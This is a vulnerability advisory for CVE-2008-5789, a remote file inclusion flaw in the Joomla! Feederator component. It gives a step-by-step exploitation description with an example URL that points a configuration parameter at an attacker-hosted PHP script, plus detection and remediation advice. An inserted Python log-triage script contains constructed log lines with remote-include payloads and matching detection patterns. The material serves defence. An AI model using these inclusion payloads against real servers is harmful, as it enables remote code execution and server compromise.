CVE-2008-5789

Source: cve@mitre.org

HIGH
7.5
Published: December 31, 2008 at 11:30 AM
Modified: April 9, 2025 at 12:30 AM

Vulnerability Description

Multiple PHP remote file inclusion vulnerabilities in the Recly Interactive Feederator (com_feederator) component 1.0.5 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) mosConfig_absolute_path parameter to (a) add_tmsp.php, (b) edit_tmsp.php and (c) tmsp.php in includes/tmsp/; and the (2) GLOBALS[mosConfig_absolute_path] parameter to (d) includes/tmsp/subscription.php.

CVSS Metrics

Base Score
7.5
Severity
HIGH
Vector String
AV:N/AC:L/Au:N/C:P/I:P/A:P

Weaknesses (CWE)

Source: nvd@nist.gov

AI Security Analysis

01 // Technical Summary

Recly Interactive Feederator (com_feederator) component for Joomla! version 1.0.5 is vulnerable to remote file inclusion (RFI), allowing attackers to execute arbitrary PHP code on the server. This vulnerability stems from improper input validation, enabling attackers to inject malicious code through crafted URLs, potentially leading to complete system compromise.

02 // Vulnerability Mechanism

Step 1: Crafting the Malicious Payload: The attacker creates a malicious PHP script (e.g., a web shell) and hosts it on a publicly accessible server.

Step 2: Identifying the Vulnerable URL: The attacker identifies the Joomla! installation and the vulnerable component (com_feederator version 1.0.5).

Step 3: Exploiting the RFI Vulnerability: The attacker crafts a URL that exploits the RFI vulnerability. This URL includes the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter, pointing to the attacker's malicious PHP script. For example: index.php?option=com_feederator&mosConfig_absolute_path=http://attacker.com/malicious.php or similar variations depending on the vulnerable file.

Step 4: Code Execution: When the vulnerable PHP file attempts to include the specified file, the attacker's malicious PHP code is executed on the server.

Step 5: Gaining Control: The attacker uses the executed code (e.g., the web shell) to gain control of the server, potentially leading to data exfiltration, further exploitation, or complete system compromise.

03 // Deep Technical Analysis

The vulnerability arises from the lack of proper input validation in the Recly Interactive Feederator component. Specifically, the component uses the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] variables to include files without sanitizing the user-supplied input. This allows an attacker to specify a URL pointing to a malicious PHP script hosted on a remote server. When the vulnerable PHP files (add_tmsp.php, edit_tmsp.php, tmsp.php, and subscription.php) attempt to include the attacker-controlled file, the malicious code is executed within the context of the Joomla! application, granting the attacker control over the server. The root cause is the failure to validate and sanitize user-provided input used in the include or require functions, leading to code injection.

04 // Exploitation Status

Public PoC. Exploits are readily available online. The age of the vulnerability suggests it is likely actively exploited in the wild, particularly against unpatched or outdated Joomla! installations.

05 // Threat Intelligence

While no specific APTs are definitively linked to this specific CVE, the nature of the vulnerability makes it attractive to a wide range of attackers, including those seeking to establish a foothold on a server for further attacks. This type of vulnerability is often used by botnets and opportunistic attackers. Not in CISA KEV.

06 // Detection & Hunting

  • Web server access logs: Look for requests that carry a mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] query parameter at all (this is a Joomla! configuration variable that a legitimate client never sends), and treat any value that is an external URL rather than a local path as an exploitation attempt. Decode URL-encoded parameter names and values before matching, since the bracketed GLOBALS form is usually sent encoded.

  • Intrusion Detection Systems (IDS): Configure IDS rules to detect RFI attempts, specifically those targeting the vulnerable component and using the identified parameters.

  • File Integrity Monitoring (FIM): Monitor critical Joomla! files for unauthorized modifications, especially those related to the vulnerable component.

  • Network traffic analysis: Analyze network traffic for unusual outbound connections from the web server, which could indicate command and control (C2) communication or data exfiltration.

  • Web application firewall (WAF) logs: Review WAF logs for blocked requests that match RFI attack patterns.
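A small log-triage script, added here as an example and not part of the advisory, that applies the access-log bullet above to constructed Apache combined-format lines: it URL-decodes the query string, flags any client-supplied mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] value, and classifies values carrying a remote URL or PHP stream wrapper as RFI attempts. The sample lines, hosts and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2009:03:12:44 +0000] "GET /components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=http://198.51.100.7/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [10/Jan/2009:03:12:45 +0000] "GET /components/com_feederator/includes/tmsp/subscription.php?GLOBALS%5BmosConfig_absolute_path%5D=ftp%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Jan/2009:03:13:01 +0000] "GET /index.php?option=com_feederator&Itemid=5 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Jan/2009:03:13:02 +0000] "GET /components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 500 220 "-" "curl/7.19"
"""

# Parameter names from the advisory (compared case-insensitively after decoding).
PARAMS = {"mosconfig_absolute_path", "globals[mosconfig_absolute_path]"}
# Files named in the advisory as the vulnerable include sites.
VULN_FILES = ("add_tmsp.php", "edit_tmsp.php", "tmsp.php", "subscription.php")
# A value that is a URL (http://, https://, ftp://, or scheme-relative //host) ...
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# ... or a PHP stream wrapper is the remote-inclusion signature.
WRAPPER = re.compile(r"^\s*(?:php|data|phar|expect|glob|compress\.\w+):", re.I)
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(line):
    """Return a finding dict for one log line, or None if it is not of interest."""
    m = REQ.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in PARAMS:
            continue
        # The variable should never come from a client at all; a URL or wrapper
        # in it is an RFI attempt, anything else is still a config override.
        kind = "remote-include" if REMOTE.match(value) or WRAPPER.match(value) else "param-override"
        return {
            "client": line.split()[0],
            "file": path.rsplit("/", 1)[-1],
            "param": name,
            "value": value,
            "kind": kind,
            "in_vuln_file": path.endswith(tuple("/" + f for f in VULN_FILES)),
        }
    return None


def scan(log_text):
    """Run classify() over every line and keep the findings."""
    return [hit for hit in (classify(ln) for ln in log_text.splitlines()) if hit]
```

Findings with kind "remote-include" against a file flagged in_vuln_file are the ones to escalate first; "param-override" hits still warrant a look because the variable is never legitimately client-supplied.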

07 // Remediation & Hardening

  • Upgrade to a patched version of the Recly Interactive Feederator component or remove the component entirely if not needed. Consider removing the component as a primary mitigation strategy since the component is old and likely no longer maintained.

  • Implement input validation and sanitization: Ensure that all user-supplied input is validated before it is used in a file inclusion operation. In particular, validate the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] parameters so that they can only resolve to local files inside the Joomla! installation and never to a URL or stream wrapper.

  • Disable or restrict the use of the include and require functions: If possible, restrict these functions to trusted files and directories, and disable remote file inclusion at the PHP configuration level (allow_url_include = Off) so that include and require cannot fetch a URL at all.

  • Use a Web Application Firewall (WAF): Deploy a WAF to filter malicious traffic and block RFI attempts.

  • Keep Joomla! and all installed components up-to-date: Regularly update Joomla! and all installed components to the latest versions to patch known vulnerabilities.

  • Implement a strong Content Security Policy (CSP): Configure a CSP to restrict the sources from which the browser can load resources, mitigating the impact of successful RFI exploits.

  • Regularly scan the web server for malware and vulnerabilities.

08 // Affected Products

Recly Interactive Feederator (com_feederator) component 1.0.5 for Joomla!

09 // Discovered Proof of Concept Links